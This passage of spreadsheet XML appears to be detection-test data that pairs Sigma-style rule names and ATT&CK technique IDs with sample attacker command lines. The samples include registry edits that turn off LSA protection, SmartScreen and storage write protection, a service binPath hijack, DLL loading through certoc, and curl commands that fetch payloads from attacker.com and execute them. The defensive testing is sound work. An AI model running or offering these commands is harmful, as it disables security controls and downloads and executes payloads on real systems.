          <t>cmd.exe /c reg add HKLM\System\CurrentControlSet\Control\StorageDevicePolicies /v WriteProtect /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2243" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2243" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2243" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2243" s="43" t="n"/>
      <c r="J2243" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2243" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2244" ht="15.75" customHeight="1" s="42">
      <c r="A2244" s="43" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B2244" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_write_protect_for_storage_disabled</t>
        </is>
      </c>
      <c r="C2244" s="43" t="inlineStr">
        <is>
          <t>Write Protect For Storage Disabled</t>
        </is>
      </c>
      <c r="D2244" s="43" t="inlineStr">
        <is>
          <t>75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13</t>
        </is>
      </c>
      <c r="E2244" s="43" t="inlineStr">
        <is>
          <t>cmd /c reg add "HKLM\System\CurrentControlSet\Control\StorageDevicePolicies" /v WriteProtect /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2244" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2244" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2244" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2244" s="43" t="n"/>
      <c r="J2244" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2244" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2245" ht="15.75" customHeight="1" s="42">
      <c r="A2245" s="43" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B2245" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_write_protect_for_storage_disabled</t>
        </is>
      </c>
      <c r="C2245" s="43" t="inlineStr">
        <is>
          <t>Write Protect For Storage Disabled</t>
        </is>
      </c>
      <c r="D2245" s="43" t="inlineStr">
        <is>
          <t>75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13</t>
        </is>
      </c>
      <c r="E2245" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c reg add HKLM\System\CurrentControlSet\Control\StorageDevicePolicies /v WriteProtect /d 0 /t REG_DWORD /f</t>
        </is>
      </c>
      <c r="F2245" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2245" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2245" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2245" s="43" t="n"/>
      <c r="J2245" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2245" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2246" ht="15.75" customHeight="1" s="42">
      <c r="A2246" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2246" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C2246" s="43" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D2246" s="43" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E2246" s="43" t="inlineStr">
        <is>
          <t>sc.exe  config   "WeakService"   BINPATH=   "mal.exe"</t>
        </is>
      </c>
      <c r="F2246" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2246" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2246" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2246" s="43" t="n"/>
      <c r="J2246" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2246" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2247" ht="15.75" customHeight="1" s="42">
      <c r="A2247" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2247" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C2247" s="43" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D2247" s="43" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E2247" s="43" t="inlineStr">
        <is>
          <t>sc.exe config WeakService binPath= "mal.exe"</t>
        </is>
      </c>
      <c r="F2247" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2247" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2247" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2247" s="43" t="n"/>
      <c r="J2247" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2247" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2248" ht="15.75" customHeight="1" s="42">
      <c r="A2248" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2248" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C2248" s="43" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D2248" s="43" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E2248" s="43" t="inlineStr">
        <is>
          <t>sc.exe config WeakService BINPATH=mal.exe</t>
        </is>
      </c>
      <c r="F2248" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2248" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2248" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2248" s="43" t="n"/>
      <c r="J2248" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2248" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2249" ht="15.75" customHeight="1" s="42">
      <c r="A2249" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2249" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C2249" s="43" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D2249" s="43" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E2249" s="43" t="inlineStr">
        <is>
          <t>sc.exe config WeakService "BINPATH=mal.exe"</t>
        </is>
      </c>
      <c r="F2249" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2249" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2249" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2249" s="43" t="n"/>
      <c r="J2249" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2249" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2250" ht="15.75" customHeight="1" s="42">
      <c r="A2250" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2250" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C2250" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D2250" s="43" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E2250" s="43" t="inlineStr">
        <is>
          <t>reg.exe add HKCU\Control\ Panel\Desktop /v Wallpaper /d C:\Users\Public\bg.jpg</t>
        </is>
      </c>
      <c r="F2250" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2250" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2250" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2250" s="43" t="n"/>
      <c r="J2250" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2250" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2251" ht="15.75" customHeight="1" s="42">
      <c r="A2251" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2251" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C2251" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D2251" s="43" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E2251" s="43" t="inlineStr">
        <is>
          <t>reg.exe add HKCU\Control_Panel\Desktop /v Wallpaper /d C:\Users\Public\bg.jpg</t>
        </is>
      </c>
      <c r="F2251" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2251" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2251" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2251" s="43" t="n"/>
      <c r="J2251" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2251" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2252" ht="15.75" customHeight="1" s="42">
      <c r="A2252" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2252" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C2252" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D2252" s="43" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E2252" s="43" t="inlineStr">
        <is>
          <t>reg add HKCU\Control\ Panel\Desktop /v Wallpaper /d C:\Users\Public\bg.jpg</t>
        </is>
      </c>
      <c r="F2252" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2252" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2252" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2252" s="43" t="n"/>
      <c r="J2252" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2252" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2253" ht="15.75" customHeight="1" s="42">
      <c r="A2253" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2253" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C2253" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D2253" s="43" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E2253" s="43" t="inlineStr">
        <is>
          <t>reg.exe add HKCU\Control Panel\Desktop /v Wallpaper /d C:\Users\Public\bg.jpg</t>
        </is>
      </c>
      <c r="F2253" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2253" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2253" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2253" s="43" t="n"/>
      <c r="J2253" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2253" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2254" ht="15.75" customHeight="1" s="42">
      <c r="A2254" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2254" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_nolmhash</t>
        </is>
      </c>
      <c r="C2254" s="43" t="inlineStr">
        <is>
          <t>Enable LM Hash Storage - ProcCreation</t>
        </is>
      </c>
      <c r="D2254" s="43" t="inlineStr">
        <is>
          <t>98dedfdd-8333-49d4-9f23-d7018cccae53</t>
        </is>
      </c>
      <c r="E2254" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "NoLMHash" /t REG_DWORD /d "0" /f</t>
        </is>
      </c>
      <c r="F2254" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2254" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2254" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2254" s="43" t="n"/>
      <c r="J2254" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2254" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2255" ht="15.75" customHeight="1" s="42">
      <c r="A2255" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2255" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_nolmhash</t>
        </is>
      </c>
      <c r="C2255" s="43" t="inlineStr">
        <is>
          <t>Enable LM Hash Storage - ProcCreation</t>
        </is>
      </c>
      <c r="D2255" s="43" t="inlineStr">
        <is>
          <t>98dedfdd-8333-49d4-9f23-d7018cccae53</t>
        </is>
      </c>
      <c r="E2255" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa" /v "NoLMHash" /t REG_DWORD /d 0x0 /f</t>
        </is>
      </c>
      <c r="F2255" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2255" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2255" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2255" s="43" t="n"/>
      <c r="J2255" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2255" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2256" ht="15.75" customHeight="1" s="42">
      <c r="A2256" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2256" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_runonce_execution</t>
        </is>
      </c>
      <c r="C2256" s="43" t="inlineStr">
        <is>
          <t>Run Once Task Execution as Configured in Registry</t>
        </is>
      </c>
      <c r="D2256" s="43" t="inlineStr">
        <is>
          <t>198effb6-6c98-4d0c-9ea3-451fa143c45c</t>
        </is>
      </c>
      <c r="E2256" s="43" t="inlineStr">
        <is>
          <t>runonce.exe /Config</t>
        </is>
      </c>
      <c r="F2256" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2256" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2256" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2256" s="43" t="n"/>
      <c r="J2256" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2256" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2257" ht="15.75" customHeight="1" s="42">
      <c r="A2257" s="43" t="inlineStr">
        <is>
          <t>t1562.010</t>
        </is>
      </c>
      <c r="B2257" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_lsa_ppl_protection_disabled</t>
        </is>
      </c>
      <c r="C2257" s="43" t="inlineStr">
        <is>
          <t>LSA PPL Protection Disabled Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2257" s="43" t="inlineStr">
        <is>
          <t>8c0eca51-0f88-4db2-9183-fdfb10c703f9</t>
        </is>
      </c>
      <c r="E2257" s="43" t="inlineStr">
        <is>
          <t>reg   add   "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa"   /v   RunAsPPL   /d   0   /f</t>
        </is>
      </c>
      <c r="F2257" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2257" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2257" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2257" s="43" t="n"/>
      <c r="J2257" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2257" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2258" ht="15.75" customHeight="1" s="42">
      <c r="A2258" s="43" t="inlineStr">
        <is>
          <t>t1484.001</t>
        </is>
      </c>
      <c r="B2258" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_modify_group_policy_settings</t>
        </is>
      </c>
      <c r="C2258" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings</t>
        </is>
      </c>
      <c r="D2258" s="43" t="inlineStr">
        <is>
          <t>ada4b0c4-758b-46ac-9033-9004613a150d</t>
        </is>
      </c>
      <c r="E2258" s="43" t="inlineStr">
        <is>
          <t>reg add HKLM\"SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2258" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2258" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2258" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2258" s="43" t="n"/>
      <c r="J2258" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2258" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2259" ht="15.75" customHeight="1" s="42">
      <c r="A2259" s="43" t="inlineStr">
        <is>
          <t>t1484.001</t>
        </is>
      </c>
      <c r="B2259" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_modify_group_policy_settings</t>
        </is>
      </c>
      <c r="C2259" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings</t>
        </is>
      </c>
      <c r="D2259" s="43" t="inlineStr">
        <is>
          <t>ada4b0c4-758b-46ac-9033-9004613a150d</t>
        </is>
      </c>
      <c r="E2259" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System" /v GroupPolicyRefreshTimeDC /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2259" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2259" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2259" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2259" s="43" t="n"/>
      <c r="J2259" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2259" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2260" ht="15.75" customHeight="1" s="42">
      <c r="A2260" s="43" t="inlineStr">
        <is>
          <t>t1564.002</t>
        </is>
      </c>
      <c r="B2260" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_special_accounts_hide_user</t>
        </is>
      </c>
      <c r="C2260" s="43" t="inlineStr">
        <is>
          <t>Hiding User Account Via SpecialAccounts Registry Key - CommandLine</t>
        </is>
      </c>
      <c r="D2260" s="43" t="inlineStr">
        <is>
          <t>9ec9fb1b-e059-4489-9642-f270c207923d</t>
        </is>
      </c>
      <c r="E2260" s="43" t="inlineStr">
        <is>
          <t>reg.exe add HKLM\SOFTWARE\Microsoft\Windows\NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v HiddenUser /d 0 /f</t>
        </is>
      </c>
      <c r="F2260" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2260" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2260" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2260" s="43" t="n"/>
      <c r="J2260" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2260" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2261" ht="15.75" customHeight="1" s="42">
      <c r="A2261" s="43" t="inlineStr">
        <is>
          <t>t1564.002</t>
        </is>
      </c>
      <c r="B2261" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_special_accounts_hide_user</t>
        </is>
      </c>
      <c r="C2261" s="43" t="inlineStr">
        <is>
          <t>Hiding User Account Via SpecialAccounts Registry Key - CommandLine</t>
        </is>
      </c>
      <c r="D2261" s="43" t="inlineStr">
        <is>
          <t>9ec9fb1b-e059-4489-9642-f270c207923d</t>
        </is>
      </c>
      <c r="E2261" s="43" t="inlineStr">
        <is>
          <t>reg add HKLM\SOFTWARE\Microsoft\Windows\NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v HiddenUser /d 0</t>
        </is>
      </c>
      <c r="F2261" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2261" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2261" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2261" s="43" t="n"/>
      <c r="J2261" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2261" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2262" ht="15.75" customHeight="1" s="42">
      <c r="A2262" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2262" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_addinutil_uncommon_cmdline</t>
        </is>
      </c>
      <c r="C2262" s="43" t="inlineStr">
        <is>
          <t>Uncommon AddinUtil.EXE CommandLine Execution</t>
        </is>
      </c>
      <c r="D2262" s="43" t="inlineStr">
        <is>
          <t>4f2cd9b6-4a17-440f-bb2a-687abb65993a</t>
        </is>
      </c>
      <c r="E2262" s="43" t="inlineStr">
        <is>
          <t>AddInUtil.exe -AddInRoot:C:\\Users\\Public\\Payload\</t>
        </is>
      </c>
      <c r="F2262" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2262" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2262" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2262" s="43" t="n"/>
      <c r="J2262" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2262" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2263" ht="15.75" customHeight="1" s="42">
      <c r="A2263" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2263" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_load_dll</t>
        </is>
      </c>
      <c r="C2263" s="43" t="inlineStr">
        <is>
          <t>DLL Loaded via CertOC.EXE</t>
        </is>
      </c>
      <c r="D2263" s="43" t="inlineStr">
        <is>
          <t>242301bc-f92f-4476-8718-78004a6efd9f</t>
        </is>
      </c>
      <c r="E2263" s="43" t="inlineStr">
        <is>
          <t>certoc.exe -loaddll" malicious.dll</t>
        </is>
      </c>
      <c r="F2263" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2263" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2263" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2263" s="43" t="n"/>
      <c r="J2263" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2263" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2264" ht="15.75" customHeight="1" s="42">
      <c r="A2264" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2264" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_load_dll</t>
        </is>
      </c>
      <c r="C2264" s="43" t="inlineStr">
        <is>
          <t>DLL Loaded via CertOC.EXE</t>
        </is>
      </c>
      <c r="D2264" s="43" t="inlineStr">
        <is>
          <t>242301bc-f92f-4476-8718-78004a6efd9f</t>
        </is>
      </c>
      <c r="E2264" s="43" t="inlineStr">
        <is>
          <t>certoc.exe -loaddll .\malicious.dll</t>
        </is>
      </c>
      <c r="F2264" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2264" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2264" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2264" s="43" t="n"/>
      <c r="J2264" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2264" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2265" ht="15.75" customHeight="1" s="42">
      <c r="A2265" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2265" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_load_dll</t>
        </is>
      </c>
      <c r="C2265" s="43" t="inlineStr">
        <is>
          <t>DLL Loaded via CertOC.EXE</t>
        </is>
      </c>
      <c r="D2265" s="43" t="inlineStr">
        <is>
          <t>242301bc-f92f-4476-8718-78004a6efd9f</t>
        </is>
      </c>
      <c r="E2265" s="43" t="inlineStr">
        <is>
          <t>certoc.exe -loaddll malicious</t>
        </is>
      </c>
      <c r="F2265" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2265" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2265" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2265" s="43" t="n"/>
      <c r="J2265" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2265" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2266" ht="15.75" customHeight="1" s="42">
      <c r="A2266" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2266" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C2266" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D2266" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E2266" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c curl.exe http://example.com/payload.exe -o payload.exe &amp; .\payload.exe</t>
        </is>
      </c>
      <c r="F2266" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2266" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2266" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2266" s="43" t="n"/>
      <c r="J2266" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2266" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2267" ht="15.75" customHeight="1" s="42">
      <c r="A2267" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2267" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C2267" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D2267" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E2267" s="43" t="inlineStr">
        <is>
          <t>curl -s http://attacker.com/payload.ps1 --output payload.ps1 ; powershell -ExecutionPolicy Bypass -File payload.ps1</t>
        </is>
      </c>
      <c r="F2267" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2267" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2267" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2267" s="43" t="n"/>
      <c r="J2267" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2267" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2268" ht="15.75" customHeight="1" s="42">
      <c r="A2268" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2268" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C2268" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D2268" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E2268" s="43" t="inlineStr">
        <is>
          <t>curl -sL http://attacker.com/payload.exe -O &amp;&amp; payload.exe</t>
        </is>
      </c>
      <c r="F2268" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2268" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2268" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2268" s="43" t="n"/>
      <c r="J2268" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2268" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2269" ht="15.75" customHeight="1" s="42">
      <c r="A2269" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2269" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C2269" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D2269" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E2269" s="43" t="inlineStr">
        <is>
          <t>curl http://attacker.com/payload.exe -o payload.exe &amp;&amp; payload.exe</t>
        </is>
      </c>
      <c r="F2269" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2269" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2269" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2269" s="43" t="n"/>
      <c r="J2269" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2269" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2270" ht="15.75" customHeight="1" s="42">
      <c r="A2270" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2270" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C2270" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D2270" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E2270" s="43" t="inlineStr">
        <is>
          <t>curl http://attacker.com/payload.exe -o payload.exe &amp; .\payload.exe</t>
        </is>
      </c>
      <c r="F2270" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2270" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2270" s="43" t="b">
        <v>0</v>
      </c>
